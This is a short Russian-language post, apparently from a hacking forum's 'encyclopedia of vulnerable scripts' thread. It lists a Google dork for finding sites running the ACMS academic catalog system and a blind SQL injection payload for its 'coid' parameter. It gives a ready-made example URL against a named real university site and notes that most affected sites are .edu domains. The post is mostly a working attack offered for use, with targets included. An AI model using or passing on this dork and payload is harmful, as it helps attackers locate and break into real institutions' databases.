Тема: Энциклопедия уязвимых скриптов
Показать сообщение отдельно

  #75  
Старый 07.12.2008, 22:44
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию
CMS: [ ACMS™ ]

Developer: [ http://www.acalog.com/ ]

Dork: [ Powered by the acalog™ academic catalog management system (ACMS™) inurl:"?coid=" ]

Bug type: [ Blind Sql Injection ]

Bug: [ coid=63+and+ascii(lower(substring((version()),1,1) ))=52/* ]

Example: [ http://catalog.sdstate.edu/preview_course.php?catoid=2&coid=63+and+ascii(lowe r(substring((version()),1,1)))=52/* ]


Примечательно, что большинство сайтов с бажной цмс находятся в доменной зоне .edu
 
Ответить с цитированием